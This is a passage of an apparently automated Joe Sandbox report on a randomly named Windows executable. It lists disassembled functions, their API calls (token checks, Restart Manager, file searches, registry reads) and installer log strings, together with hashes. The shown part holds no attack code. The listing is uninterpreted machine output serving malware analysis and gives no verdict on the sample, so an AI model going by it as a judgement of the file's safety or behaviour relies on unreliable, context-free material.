19 API calls 56425->56788 56426 480a5d 56790 47f50c 56 API calls 56426->56790 56794 47f33c 
38 API calls 56429->56794 56434 480ac1 56430->56434 56792 47f50c 56 API calls 56430->56792 56433->56420 56793 47f33c 38 API calls 56434->56793 56437 480ac8 56438 480ada 56437->56438 56439 480ae0 56437->56439 56440 480ade 56438->56440 56444 47f4e8 56 API calls 56438->56444 56439->56440 56442 47f4e8 56 API calls 56439->56442 56541 47c66c 56440->56541 56442->56440 56444->56440 56542 42d898 GetWindowsDirectoryA 56541->56542 56543 47c690 56542->56543 56544 403450 18 API calls 56543->56544 56545 47c69d 56544->56545 56546 42d8c4 GetSystemDirectoryA 56545->56546 56547 47c6a5 56546->56547 56548 403450 18 API calls 56547->56548 56549 47c6b2 56548->56549 56550 42d8f0 6 API calls 56549->56550 56551 47c6ba 56550->56551 56552 403450 18 API calls 56551->56552 56553 47c6c7 56552->56553 56554 47c6d0 56553->56554 56555 47c6ec 56553->56555 56826 42d208 56554->56826 56557 403400 4 API calls 56555->56557 56559 47c6ea 56557->56559 56561 47c731 56559->56561 56563 42c8cc 19 API calls 56559->56563 56560 403450 18 API calls 56560->56559 56806 47c4f4 56561->56806 56565 47c70c 56563->56565 56567 403450 18 API calls 56565->56567 56566 403450 18 API calls 56568 47c74d 56566->56568 56569 47c719 56567->56569 56570 47c76b 56568->56570 56571 4035c0 18 API calls 56568->56571 56569->56561 56573 403450 18 API calls 56569->56573 56572 47c4f4 22 API calls 56570->56572 56571->56570 56574 47c77a 56572->56574 56573->56561 56575 403450 18 API calls 56574->56575 56576 47c787 56575->56576 56577 47c7af 56576->56577 56579 42c3fc 19 API calls 56576->56579 56578 47c816 56577->56578 56580 47c4f4 22 API calls 56577->56580 56582 47c8de 56578->56582 56583 47c836 SHGetKnownFolderPath 56578->56583 56581 47c79d 56579->56581 56584 47c7c7 56580->56584 56587 4035c0 18 API calls 56581->56587 56585 47c8e7 56582->56585 56586 47c908 56582->56586 56588 47c850 56583->56588 56589 47c88b SHGetKnownFolderPath 56583->56589 56590 403450 18 API calls 56584->56590 56591 42c3fc 19 API calls 56585->56591 56592 42c3fc 19 API calls 
56586->56592 56587->56577 56589->56582 56787->56425 56789->56426 56790->56419 56791->56420 56792->56434 56793->56437 56794->56437 56807 42de1c RegOpenKeyExA 56806->56807 56808 47c51a 56807->56808 56809 47c540 56808->56809 56810 47c51e 56808->56810 56811 403400 4 API calls 56809->56811 56812 42dd4c 20 API calls 56810->56812 56813 47c547 56811->56813 56814 47c52a 56812->56814 56813->56566 56815 47c535 RegCloseKey 56814->56815 56816 403400 4 API calls 56814->56816 56815->56813 56816->56815 56827 4038a4 18 API calls 56826->56827 56828 42d21b 56827->56828 56829 42d232 GetEnvironmentVariableA 56828->56829 56833 42d245 56828->56833 56838 42dbd0 18 API calls 56828->56838 56829->56828 56830 42d23e 56829->56830 56832 403400 4 API calls 56830->56832 56832->56833 56833->56560 56838->56828
                                                                                                                            Strings
                                                                                                                            • Installing into GAC, xrefs: 00471714
                                                                                                                            • Non-default bitness: 32-bit, xrefs: 004708BB
                                                                                                                            • Same version. Skipping., xrefs: 00470CE5
                                                                                                                            • Uninstaller requires administrator: %s, xrefs: 0047118F
                                                                                                                            • Existing file's SHA-1 hash matches our file. Skipping., xrefs: 00470CB5
                                                                                                                            • Version of existing file: (none), xrefs: 00470CFA
                                                                                                                            • Dest file exists., xrefs: 004709BB
                                                                                                                            • Existing file is a newer version. Skipping., xrefs: 00470C02
                                                                                                                            • Stripped read-only attribute., xrefs: 00470EC7
                                                                                                                            • Same time stamp. Skipping., xrefs: 00470D55
                                                                                                                            • Existing file has a later time stamp. Skipping., xrefs: 00470DCF
                                                                                                                            • Time stamp of our file: %s, xrefs: 0047099B
                                                                                                                            • Dest file is protected by Windows File Protection., xrefs: 004708ED
                                                                                                                            • Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 00470CC4
                                                                                                                            • Couldn't read time stamp. Skipping., xrefs: 00470D35
                                                                                                                            • Incrementing shared file count (64-bit)., xrefs: 0047158C
                                                                                                                            • Non-default bitness: 64-bit, xrefs: 004708AF
                                                                                                                            • Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 00470CD0
                                                                                                                            • Skipping due to "onlyifdestfileexists" flag., xrefs: 00470EFA
                                                                                                                            • -- File entry --, xrefs: 004706FB
                                                                                                                            • InUn, xrefs: 0047115F
                                                                                                                            • Existing file is protected by Windows File Protection. Skipping., xrefs: 00470DEC
                                                                                                                            • , xrefs: 00470BCF, 00470DA0, 00470E1E
                                                                                                                            • Version of existing file: %u.%u.%u.%u, xrefs: 00470B7C
                                                                                                                            • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 00470E96
                                                                                                                            • Incrementing shared file count (32-bit)., xrefs: 004715A5
                                                                                                                            • Installing the file., xrefs: 00470F09
                                                                                                                            • Failed to strip read-only attribute., xrefs: 00470ED3
                                                                                                                            • Skipping due to "onlyifdoesntexist" flag., xrefs: 004709CE
                                                                                                                            • Dest filename: %s, xrefs: 00470894
                                                                                                                            • Time stamp of our file: (failed to read), xrefs: 004709A7
                                                                                                                            • Will register the file (a DLL/OCX) later., xrefs: 0047151F
                                                                                                                            • Time stamp of existing file: (failed to read), xrefs: 00470A37
                                                                                                                            • Time stamp of existing file: %s, xrefs: 00470A2B
                                                                                                                            • Version of our file: (none), xrefs: 00470AFC
                                                                                                                            • Version of our file: %u.%u.%u.%u, xrefs: 00470AF0
                                                                                                                            • @, xrefs: 004707B0
                                                                                                                            • Will register the file (a type library) later., xrefs: 00471513
                                                                                                                            • User opted not to overwrite the existing file. Skipping., xrefs: 00470E4D
                                                                                                                            • .tmp, xrefs: 00470FB7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing into GAC$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
                                                                                                                            • API String ID: 0-4021121268
                                                                                                                            • Opcode ID: 6e9aa0429d3ef6c301c4ffa8bc69751cfab5ace8c443bbbcc7db1e17fca961c0
                                                                                                                            • Instruction ID: 04e5041402f80353ef90c659d92e8d378e84d4fed116f8838aecbbc27e5febe3
                                                                                                                            • Opcode Fuzzy Hash: 6e9aa0429d3ef6c301c4ffa8bc69751cfab5ace8c443bbbcc7db1e17fca961c0
                                                                                                                            • Instruction Fuzzy Hash: 31927574A0424CDFDB21DFA9C445BDDBBB5AF05304F1480ABE848A7392D7789E49CB19
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1578 42e09c-42e0ad 1579 42e0b8-42e0dd AllocateAndInitializeSid 1578->1579 1580 42e0af-42e0b3 1578->1580 1581 42e287-42e28f 1579->1581 1582 42e0e3-42e100 GetVersion 1579->1582 1580->1581 1583 42e102-42e117 GetModuleHandleA GetProcAddress 1582->1583 1584 42e119-42e11b 1582->1584 1583->1584 1585 42e142-42e15c GetCurrentThread OpenThreadToken 1584->1585 1586 42e11d-42e12b CheckTokenMembership 1584->1586 1589 42e193-42e1bb GetTokenInformation 1585->1589 1590 42e15e-42e168 GetLastError 1585->1590 1587 42e131-42e13d 1586->1587 1588 42e269-42e27f FreeSid 1586->1588 1587->1588 1591 42e1d6-42e1fa call 402648 GetTokenInformation 1589->1591 1592 42e1bd-42e1c5 GetLastError 1589->1592 1593 42e174-42e187 GetCurrentProcess OpenProcessToken 1590->1593 1594 42e16a-42e16f call 4031bc 1590->1594 1605 42e208-42e210 1591->1605 1606 42e1fc-42e206 call 4031bc * 2 1591->1606 1592->1591 1595 42e1c7-42e1d1 call 4031bc * 2 1592->1595 1593->1589 1598 42e189-42e18e call 4031bc 1593->1598 1594->1581 1595->1581 1598->1581 1607 42e212-42e213 1605->1607 1608 42e243-42e261 call 402660 CloseHandle 1605->1608 1606->1581 1611 42e215-42e228 EqualSid 1607->1611 1615 42e22a-42e237 1611->1615 1616 42e23f-42e241 1611->1616 1615->1616 1619 42e239-42e23d 1615->1619 1616->1608 1616->1611 1619->1608
                                                                                                                            APIs
                                                                                                                            • AllocateAndInitializeSid.ADVAPI32(00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0D6
                                                                                                                            • GetVersion.KERNEL32(00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0F3
                                                                                                                            • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E10C
                                                                                                                            • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E112
                                                                                                                            • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E127
                                                                                                                            • FreeSid.ADVAPI32(00000000,0042E287,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E27A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
                                                                                                                            • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                            • API String ID: 2252812187-1888249752
                                                                                                                            • Opcode ID: a9f409996ddfe82e0213da269ff1de212d34eb3ec341ac20085b7d7d2472ef68
                                                                                                                            • Instruction ID: e5677345bf142a8b1d9111380f95962c8bb8cf61ba8e960ca5c3fd0f127139eb
                                                                                                                            • Opcode Fuzzy Hash: a9f409996ddfe82e0213da269ff1de212d34eb3ec341ac20085b7d7d2472ef68
                                                                                                                            • Instruction Fuzzy Hash: E351A271B44215EEEB10EAE69C42BBF77ACEB09704F9404BBB901F7281D57C99018B79
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetVersion.KERNEL32(00480B52), ref: 004502D3
                                                                                                                            • LoadLibraryA.KERNEL32(Rstrtmgr.dll,00480B52), ref: 004502EB
                                                                                                                            • GetProcAddress.KERNEL32(6CC70000,RmStartSession), ref: 00450309
                                                                                                                            • GetProcAddress.KERNEL32(6CC70000,RmRegisterResources), ref: 0045031E
                                                                                                                            • GetProcAddress.KERNEL32(6CC70000,RmGetList), ref: 00450333
                                                                                                                            • GetProcAddress.KERNEL32(6CC70000,RmShutdown), ref: 00450348
                                                                                                                            • GetProcAddress.KERNEL32(6CC70000,RmRestart), ref: 0045035D
                                                                                                                            • GetProcAddress.KERNEL32(6CC70000,RmEndSession), ref: 00450372
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$LibraryLoadVersion
                                                                                                                            • String ID: RmEndSession$RmGetList$RmRegisterResources$RmRestart$RmShutdown$RmStartSession$Rstrtmgr.dll
                                                                                                                            • API String ID: 1968650500-3419246398
                                                                                                                            • Opcode ID: 2681632e5309952c30eea3f8c2bf2722b4339596373eceda0d07b93e3cd0d7e4
                                                                                                                            • Instruction ID: c77cef2ad5653e61b65a4477cbb73d0d56cf7b8a9d174f96be3e9b6947252677
                                                                                                                            • Opcode Fuzzy Hash: 2681632e5309952c30eea3f8c2bf2722b4339596373eceda0d07b93e3cd0d7e4
                                                                                                                            • Instruction Fuzzy Hash: B211F7B4510301DBD710FB61BF45A2E36E9E728315B08063FE804961A2CB7C4844CF8C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 22958418fcb5307417e2cb8c5b21c835fdc4d5c2778e3f26f52eb9817f6a2da5
                                                                                                                            • Instruction ID: afb4f91cf4018cf9acc1c9974f14325182323c15c0e0405bd0f9b005e596376e
                                                                                                                            • Opcode Fuzzy Hash: 22958418fcb5307417e2cb8c5b21c835fdc4d5c2778e3f26f52eb9817f6a2da5
                                                                                                                            • Instruction Fuzzy Hash: 03E1AE31700124EFDB04DF69E989AADB7B5FB54300FA440AAE5559B352C73CEE81DB09
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004958CC: GetWindowRect.USER32(00000000), ref: 004958E2
                                                                                                                            • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 00467773
                                                                                                                              • Part of subcall function 0041D6B0: GetObjectA.GDI32(?,00000018,0046778D), ref: 0041D6DB
                                                                                                                              • Part of subcall function 00467180: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00467223
                                                                                                                              • Part of subcall function 00467180: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467249
                                                                                                                              • Part of subcall function 00467180: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004672A0
                                                                                                                              • Part of subcall function 00466B40: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467828,00000000,00000000,00000000,0000000C,00000000), ref: 00466B58
                                                                                                                              • Part of subcall function 00495B50: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 00495B5A
                                                                                                                              • Part of subcall function 0042ED38: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA8
                                                                                                                              • Part of subcall function 0042ED38: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDC5
                                                                                                                              • Part of subcall function 0049581C: GetDC.USER32(00000000), ref: 0049583E
                                                                                                                              • Part of subcall function 0049581C: SelectObject.GDI32(?,00000000), ref: 00495864
                                                                                                                              • Part of subcall function 0049581C: ReleaseDC.USER32(00000000,?), ref: 004958B5
                                                                                                                              • Part of subcall function 00495B40: MulDiv.KERNEL32(0000004B,?,00000006), ref: 00495B4A
                                                                                                                            • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,021D0BD4,021D2934,?,?,021D2964,?,?,021D29B4,?), ref: 004683FD
                                                                                                                            • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 0046840E
                                                                                                                            • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00468426
                                                                                                                              • Part of subcall function 0042A05C: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A072
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Menu$AppendExtractIconObject$AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadMessageProcRectReleaseSelectSendSystemUserWindow
                                                                                                                            • String ID: $(Default)$STOPIMAGE$%H
                                                                                                                            • API String ID: 3231140908-2624782221
                                                                                                                            • Opcode ID: cd61aa661d0cbe35304877807cea77ca0702e96d718fc27b010991c92e86a780
                                                                                                                            • Instruction ID: 1a3196d4b4984e68f3522cc8585b165e0004af585c118fa25862355e2bbb38c0
                                                                                                                            • Opcode Fuzzy Hash: cd61aa661d0cbe35304877807cea77ca0702e96d718fc27b010991c92e86a780
                                                                                                                            • Instruction Fuzzy Hash: 95F2C6346005248FCB00EF69D9D9F9973F1BF49304F1582BAE5049B36ADB74AC46CB9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 00474FE1
                                                                                                                            • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 004750BE
                                                                                                                            • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 004750CC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$File$CloseFirstNext
                                                                                                                            • String ID: unins$unins???.*
                                                                                                                            • API String ID: 3541575487-1009660736
                                                                                                                            • Opcode ID: 490a2bf6f62b777b12f8bb075fd261ec892e44da2a65e6c72c5e66397d3a6b60
                                                                                                                            • Instruction ID: 191fa049ef1442540897bd6b232d6b1da598bf4afdbbee48782243349675ce5a
                                                                                                                            • Opcode Fuzzy Hash: 490a2bf6f62b777b12f8bb075fd261ec892e44da2a65e6c72c5e66397d3a6b60
                                                                                                                            • Instruction Fuzzy Hash: 95315074A00548ABCB10EB65CD81BDEB7A9DF45304F50C0B6E40CAB3A2DB789F418B59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00452AC3,?,?,-00000001,00000000), ref: 00452A9D
                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000000,00452AC3,?,?,-00000001,00000000), ref: 00452AA5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorFileFindFirstLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 873889042-0
                                                                                                                            • Opcode ID: 9c675a8f1f28b386d0fa8c71b8ecb41695e84785a8bb79b0d9bc0322d07a8b6a
                                                                                                                            • Instruction ID: 3e58272229af866f17ac5928e9872a720c3be2d4903e778e839a846eb7d55d53
                                                                                                                            • Opcode Fuzzy Hash: 9c675a8f1f28b386d0fa8c71b8ecb41695e84785a8bb79b0d9bc0322d07a8b6a
                                                                                                                            • Instruction Fuzzy Hash: 94F0F971A04604AB8B10EF669D4149EF7ACEB8672571046BBFC14E3282DAB84E0485A8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoLocale
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2299586839-0
                                                                                                                            • Opcode ID: 64da881718ef9bfb5c3691e8182369eeaf442f2681d4624e7b5adc518b999176
                                                                                                                            • Instruction ID: 8daab3ef8e56b0da8b8c23f45c5b5388ad46b50bd825570c2d348c61856efc62
                                                                                                                            • Opcode Fuzzy Hash: 64da881718ef9bfb5c3691e8182369eeaf442f2681d4624e7b5adc518b999176
                                                                                                                            • Instruction Fuzzy Hash: BFE0223170021466C311AA2A9C86AEAB34C9758310F00427FB904E73C2EDB89E4042A8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424151,?,00000000,0042415C), ref: 00423BAE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: NtdllProc_Window
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4255912815-0
                                                                                                                            • Opcode ID: 03c86555d74cd6010afd77b9e61a524e96c156e733cd5bd8e2feacc4387cef90
                                                                                                                            • Instruction ID: a748582893d7571d6ac8bdbe819d0a8fbf5f36db2d3505b6f19a51c7a0bbae16
                                                                                                                            • Opcode Fuzzy Hash: 03c86555d74cd6010afd77b9e61a524e96c156e733cd5bd8e2feacc4387cef90
                                                                                                                            • Instruction Fuzzy Hash: 47F0B979205608AF8B40DF99C588D4ABBE8AB4C260B058195B988CB321C234ED808F90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: NameUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2645101109-0
